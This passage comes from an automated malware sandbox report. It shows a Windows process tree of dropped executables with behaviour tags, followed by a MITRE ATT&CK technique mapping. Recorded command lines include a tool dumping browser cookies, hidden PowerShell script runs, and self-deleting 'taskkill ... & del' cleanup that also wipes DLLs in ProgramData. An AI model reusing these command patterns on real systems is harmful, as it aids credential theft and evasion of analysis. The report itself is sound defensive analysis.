                                                                                                                • Loads dropped DLL
                                                                                                                PID:5712
                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ASqacOXEm\ASqacOXEm.dll" ASqacOXEm
                                                                                                                  9⤵
                                                                                                                  • Loads dropped DLL
                                                                                                                  • Drops file in System32 directory
                                                                                                                  PID:5880
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa29FC.tmp\tempfile.ps1"
                                                                                                                8⤵
                                                                                                                • Drops file in Program Files directory
                                                                                                                PID:2168
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa29FC.tmp\tempfile.ps1"
                                                                                                                8⤵
                                                                                                                  PID:5144
                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa29FC.tmp\tempfile.ps1"
                                                                                                                  8⤵
                                                                                                                    PID:6464
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa29FC.tmp\tempfile.ps1"
                                                                                                                    8⤵
                                                                                                                      PID:5508
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa29FC.tmp\tempfile.ps1"
                                                                                                                      8⤵
                                                                                                                        PID:3708
                                                                                                                      • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                        8⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:6824
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:5052
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe" >> NUL
                                                                                                              3⤵
                                                                                                                PID:5748
                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                  ping 127.0.0.1
                                                                                                                  4⤵
                                                                                                                  • Runs ping.exe
                                                                                                                  PID:5860
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Checks whether UAC is enabled
                                                                                                              PID:4724
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:6608
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                3⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:5160
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                3⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:6288
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                3⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:7164
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                3⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:5236
                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                            1⤵
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            • Modifies registry class
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:1104
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                              2⤵
                                                                                                              • Checks processor information in registry
                                                                                                              • Modifies data under HKEY_USERS
                                                                                                              • Modifies registry class
                                                                                                              PID:1304
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                              2⤵
                                                                                                              • Drops file in System32 directory
                                                                                                              • Checks processor information in registry
                                                                                                              • Modifies data under HKEY_USERS
                                                                                                              • Modifies registry class
                                                                                                              PID:3768
                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                            1⤵
                                                                                                            • Drops file in Windows directory
                                                                                                            • Modifies Internet Explorer settings
                                                                                                            • Modifies registry class
                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                            PID:6180
                                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                            1⤵
                                                                                                            • Modifies Internet Explorer settings
                                                                                                            PID:6412
                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                            1⤵
                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:6888
                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                            1⤵
                                                                                                            • Modifies Internet Explorer settings
                                                                                                            • Modifies registry class
                                                                                                            PID:7052
                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                            1⤵
                                                                                                              PID:5520
                                                                                                            • C:\Windows\system32\msiexec.exe
                                                                                                              C:\Windows\system32\msiexec.exe /V
                                                                                                              1⤵
                                                                                                              • Enumerates connected drives
                                                                                                              • Drops file in Program Files directory
                                                                                                              • Drops file in Windows directory
                                                                                                              • Modifies data under HKEY_USERS
                                                                                                              • Modifies registry class
                                                                                                              PID:5680
                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding 1AB350322337C46785A118F06B500C71 C
                                                                                                                2⤵
                                                                                                                • Loads dropped DLL
                                                                                                                PID:6136
                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding FDEB9CD825816372E7F420DDD5C06C4F
                                                                                                                2⤵
                                                                                                                • Blocklisted process makes network request
                                                                                                                • Loads dropped DLL
                                                                                                                PID:3544
                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                  "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                  3⤵
                                                                                                                  • Kills process with taskkill
                                                                                                                  PID:5016
                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding 1A3D877E36CC7B57F53DDF81C7A13FA3 E Global\MSI0000
                                                                                                                2⤵
                                                                                                                • Loads dropped DLL
                                                                                                                PID:4900
                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                              1⤵
                                                                                                              • Drops file in Windows directory
                                                                                                              • Modifies registry class
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:6924
                                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                              1⤵
                                                                                                              • Modifies Internet Explorer settings
                                                                                                              PID:7040
                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                              1⤵
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:4928
                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                              1⤵
                                                                                                              • Modifies registry class
                                                                                                              PID:5132
                                                                                                            • C:\Windows\system32\werfault.exe
                                                                                                              werfault.exe /h /shared Global\82c3c38e50204bb192c352b48875f282 /t 840 /p 4928
                                                                                                              1⤵
                                                                                                                PID:4852
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\FA89.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\FA89.exe
                                                                                                                1⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                PID:4528
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /c timeout 1
                                                                                                                  2⤵
                                                                                                                    PID:4244
                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      3⤵
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:4144
                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                      timeout 1
                                                                                                                      3⤵
                                                                                                                      • Delays execution with timeout.exe
                                                                                                                      PID:424
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\FA89.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\FA89.exe"
                                                                                                                    2⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Checks processor information in registry
                                                                                                                    PID:5632
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im FA89.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\FA89.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                      3⤵
                                                                                                                        PID:688
                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                          taskkill /im FA89.exe /f
                                                                                                                          4⤵
                                                                                                                          • Kills process with taskkill
                                                                                                                          PID:4744
                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                          timeout /t 6
                                                                                                                          4⤵
                                                                                                                          • Delays execution with timeout.exe
                                                                                                                          PID:496
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4528 -s 1488
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:6460
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\FEA0.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\FEA0.exe
                                                                                                                    1⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    PID:1164
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\FEA0.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\FEA0.exe"
                                                                                                                      2⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:6320
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\2C8.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\2C8.exe
                                                                                                                    1⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    PID:5092
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 736
                                                                                                                      2⤵
                                                                                                                      • Drops file in Windows directory
                                                                                                                      • Program crash
                                                                                                                      PID:4812
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 748
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:6656
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 848
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:6548
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 884
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:5824
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1188
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:6952
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1360
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:6088
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1420
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:4564
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1484
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:5868
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1508
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:2204
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1140
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:6208
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1556
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:2864
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1664
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:4568
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1704
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:6780
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1612
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:7060
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1724
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:4716
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1752
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:6992
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1852
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:6880
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1776
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:7016
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1920
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:6764
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1816
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:4828
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1984
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:7004
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 2016
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:5704
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1908
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:4912
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 2032
                                                                                                                      2⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                      • Program crash
                                                                                                                      PID:424
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1600
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:6892
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1940
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:6400
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1960
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:6540
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1980
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:5696
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1948
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:5724
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1956
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:6056
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1980
                                                                                                                      2⤵
                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                      • Program crash
                                                                                                                      PID:4968
                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                    1⤵
                                                                                                                      PID:6068
                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                      C:\Windows\explorer.exe
                                                                                                                      1⤵
                                                                                                                        PID:6400
                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                        1⤵
                                                                                                                          PID:6020
                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                          C:\Windows\explorer.exe
                                                                                                                          1⤵
                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                          PID:5964
                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                          1⤵
                                                                                                                            PID:4948
                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                            C:\Windows\explorer.exe
                                                                                                                            1⤵
                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                            PID:5920
                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                            1⤵
                                                                                                                              PID:6960
                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                              C:\Windows\explorer.exe
                                                                                                                              1⤵
                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                              PID:5860
                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                              1⤵
                                                                                                                                PID:4792
                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                1⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Modifies registry class
                                                                                                                                PID:4456
                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                1⤵
                                                                                                                                • Modifies registry class
                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                PID:5792
                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                1⤵
                                                                                                                                  PID:5640
                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                  1⤵
                                                                                                                                    PID:5852
                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                    1⤵
                                                                                                                                    • Drops file in Windows directory
                                                                                                                                    • Modifies registry class
                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                    PID:1036
                                                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                    1⤵
                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                    PID:2096
                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                    1⤵
                                                                                                                                    • Modifies registry class
                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                    PID:6644
                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                    1⤵
                                                                                                                                    • Modifies registry class
                                                                                                                                    PID:6980
                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                    1⤵
                                                                                                                                      PID:2052
                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                      1⤵
                                                                                                                                      • Modifies registry class
                                                                                                                                      PID:1724
                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                      1⤵
                                                                                                                                      • Modifies registry class
                                                                                                                                      PID:3188
                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                      1⤵
                                                                                                                                        PID:7092
                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                        1⤵
                                                                                                                                          PID:2696

                                                                                                                                        Network

                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                        Execution

                                                                                                                                        Scheduled Task

                                                                                                                                        1
                                                                                                                                        T1053

                                                                                                                                        Persistence

                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                        1
                                                                                                                                        T1060

                                                                                                                                        Scheduled Task

                                                                                                                                        1
                                                                                                                                        T1053

                                                                                                                                        BITS Jobs

                                                                                                                                        1
                                                                                                                                        T1197

                                                                                                                                        Privilege Escalation

                                                                                                                                        Scheduled Task

                                                                                                                                        1
                                                                                                                                        T1053

                                                                                                                                        Defense Evasion

                                                                                                                                        Disabling Security Tools

                                                                                                                                        2
                                                                                                                                        T1089

                                                                                                                                        Modify Registry

                                                                                                                                        5
                                                                                                                                        T1112

                                                                                                                                        BITS Jobs

                                                                                                                                        1
                                                                                                                                        T1197

                                                                                                                                        Install Root Certificate

                                                                                                                                        1
                                                                                                                                        T1130

                                                                                                                                        Credential Access

                                                                                                                                        Credentials in Files

                                                                                                                                        5
                                                                                                                                        T1081

                                                                                                                                        Discovery

                                                                                                                                        Software Discovery

                                                                                                                                        1
                                                                                                                                        T1518

                                                                                                                                        Query Registry

                                                                                                                                        5
                                                                                                                                        T1012

                                                                                                                                        System Information Discovery

                                                                                                                                        6
                                                                                                                                        T1082

                                                                                                                                        Security Software Discovery

                                                                                                                                        1
                                                                                                                                        T1063

                                                                                                                                        Peripheral Device Discovery

                                                                                                                                        2
                                                                                                                                        T1120

                                                                                                                                        Remote System Discovery

                                                                                                                                        1
                                                                                                                                        T1018

                                                                                                                                        Collection

                                                                                                                                        Data from Local System

                                                                                                                                        5
                                                                                                                                        T1005

